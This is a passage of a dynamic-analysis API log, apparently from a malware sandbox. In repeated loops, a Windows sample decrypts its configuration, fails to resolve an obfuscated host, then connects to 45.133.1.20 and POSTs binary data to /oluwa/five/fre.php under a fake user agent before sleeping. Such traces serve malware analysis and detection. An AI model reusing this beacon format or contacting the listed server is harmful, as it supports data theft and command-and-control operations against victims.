(HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0177.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.389] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.390] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.391] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.393] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.393] GetProcessHeap () returned 0x6a0000 [0177.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0177.393] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.393] GetProcessHeap () returned 0x6a0000 [0177.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0177.394] GetProcessHeap () returned 0x6a0000 [0177.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.394] GetProcessHeap () returned 0x6a0000 [0177.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0177.394] GetProcessHeap () returned 0x6a0000 [0177.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0177.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.396] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.404] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0177.413] GetProcessHeap () returned 0x6a0000 [0177.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0177.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.414] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0177.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.415] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.416] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.416] GetProcessHeap () returned 0x6a0000 [0177.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0177.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.418] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0177.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.419] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0177.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.420] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0177.420] GetProcessHeap () returned 0x6a0000 [0177.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0177.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.421] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0177.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.422] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0177.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.424] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0177.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.425] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0177.425] GetProcessHeap () returned 0x6a0000 [0177.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0177.425] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9d48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0177.425] GetProcessHeap () returned 0x6a0000 [0177.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0177.425] socket (af=2, type=1, protocol=6) returned 0x3ac [0177.425] connect (s=0x3ac, name=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0177.450] FreeAddrInfoW (pAddrInfo=0x6b9d48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be868*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0177.450] GetProcessHeap () returned 0x6a0000 [0177.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0177.450] GetProcessHeap () returned 0x6a0000 [0177.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0177.451] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.451] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0177.452] GetProcessHeap () returned 0x6a0000 [0177.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0177.452] GetProcessHeap () returned 0x6a0000 [0177.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.452] GetProcessHeap () returned 0x6a0000 [0177.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0177.452] GetProcessHeap () returned 0x6a0000 [0177.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0177.453] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.454] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0177.454] GetProcessHeap () returned 0x6a0000 [0177.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0177.454] GetProcessHeap () returned 0x6a0000 [0177.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.454] send (s=0x3ac, buf=0x6bbd20*, len=242, flags=0) returned 242 [0177.455] send (s=0x3ac, buf=0x6bb998*, len=159, flags=0) returned 159 [0177.455] GetProcessHeap () returned 0x6a0000 [0177.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0177.455] recv (in: s=0x3ac, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0177.532] GetProcessHeap () returned 0x6a0000 [0177.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0177.532] GetProcessHeap () returned 0x6a0000 [0177.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0177.533] GetProcessHeap () returned 0x6a0000 [0177.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0177.533] GetProcessHeap () returned 0x6a0000 [0177.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0177.534] closesocket (s=0x3ac) returned 0 [0177.535] GetProcessHeap () returned 0x6a0000 [0177.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0177.535] GetProcessHeap () returned 0x6a0000 [0177.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.536] GetProcessHeap () returned 0x6a0000 [0177.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0177.537] GetProcessHeap () returned 0x6a0000 [0177.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0177.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc98) returned 0x3ac [0177.540] Sleep (dwMilliseconds=0xea60) [0177.541] GetProcessHeap () returned 0x6a0000 [0177.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0177.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.550] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0177.558] GetProcessHeap () returned 0x6a0000 [0177.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bf610 [0177.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.560] CryptImportKey (in: hProv=0x6bef48, pbData=0x6bf610, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0177.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.561] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.562] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.562] GetProcessHeap () returned 0x6a0000 [0177.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf610 | out: hHeap=0x6a0000) returned 1 [0177.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.564] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0177.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.565] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0177.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.571] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0177.571] GetProcessHeap () returned 0x6a0000 [0177.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0177.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.572] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.573] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.575] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.576] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.576] GetProcessHeap () returned 0x6a0000 [0177.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0177.576] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0177.576] GetProcessHeap () returned 0x6a0000 [0177.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0177.577] GetProcessHeap () returned 0x6a0000 [0177.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.578] GetProcessHeap () returned 0x6a0000 [0177.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0177.578] GetProcessHeap () returned 0x6a0000 [0177.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0177.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.579] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0177.599] GetProcessHeap () returned 0x6a0000 [0177.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0177.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.601] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0177.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.602] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.603] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.603] GetProcessHeap () returned 0x6a0000 [0177.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0177.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.605] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0177.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.606] CryptDestroyKey (hKey=0x6ad020) returned 1 [0177.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.607] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0177.607] GetProcessHeap () returned 0x6a0000 [0177.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0177.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.609] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0177.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.610] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0177.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.611] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0177.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.614] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0177.614] GetProcessHeap () returned 0x6a0000 [0177.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0177.614] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0177.614] GetProcessHeap () returned 0x6a0000 [0177.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0177.614] socket (af=2, type=1, protocol=6) returned 0x3b0 [0177.614] connect (s=0x3b0, name=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0177.640] FreeAddrInfoW (pAddrInfo=0x6b9c80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0177.640] GetProcessHeap () returned 0x6a0000 [0177.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0177.640] GetProcessHeap () returned 0x6a0000 [0177.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0177.641] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.641] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0177.641] GetProcessHeap () returned 0x6a0000 [0177.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0177.642] GetProcessHeap () returned 0x6a0000 [0177.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.642] GetProcessHeap () returned 0x6a0000 [0177.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0177.642] GetProcessHeap () returned 0x6a0000 [0177.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0177.643] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0177.644] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0177.644] GetProcessHeap () returned 0x6a0000 [0177.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0177.644] GetProcessHeap () returned 0x6a0000 [0177.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0177.645] send (s=0x3b0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0177.645] send (s=0x3b0, buf=0x6bb998*, len=159, flags=0) returned 159 [0177.645] GetProcessHeap () returned 0x6a0000 [0177.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0177.645] recv (in: s=0x3b0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0177.718] GetProcessHeap () returned 0x6a0000 [0177.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0177.719] GetProcessHeap () returned 0x6a0000 [0177.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0177.719] GetProcessHeap () returned 0x6a0000 [0177.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0177.720] GetProcessHeap () returned 0x6a0000 [0177.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0177.721] closesocket (s=0x3b0) returned 0 [0177.721] GetProcessHeap () returned 0x6a0000 [0177.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0177.722] GetProcessHeap () returned 0x6a0000 [0177.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0177.722] GetProcessHeap () returned 0x6a0000 [0177.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0177.722] GetProcessHeap () returned 0x6a0000 [0177.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0177.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13d0) returned 0x3b0 [0177.725] Sleep (dwMilliseconds=0xea60) [0177.727] GetProcessHeap () returned 0x6a0000 [0177.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0177.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.728] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0177.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0177.742] GetProcessHeap () returned 0x6a0000 [0177.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9b18 [0177.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.743] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b9b18, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0177.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.744] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.746] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.746] GetProcessHeap () returned 0x6a0000 [0177.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b18 | out: hHeap=0x6a0000) returned 1 [0177.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.748] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0177.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.749] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0177.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0177.750] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0177.750] GetProcessHeap () returned 0x6a0000 [0177.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0177.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.751] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.752] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0177.759] StrStrA 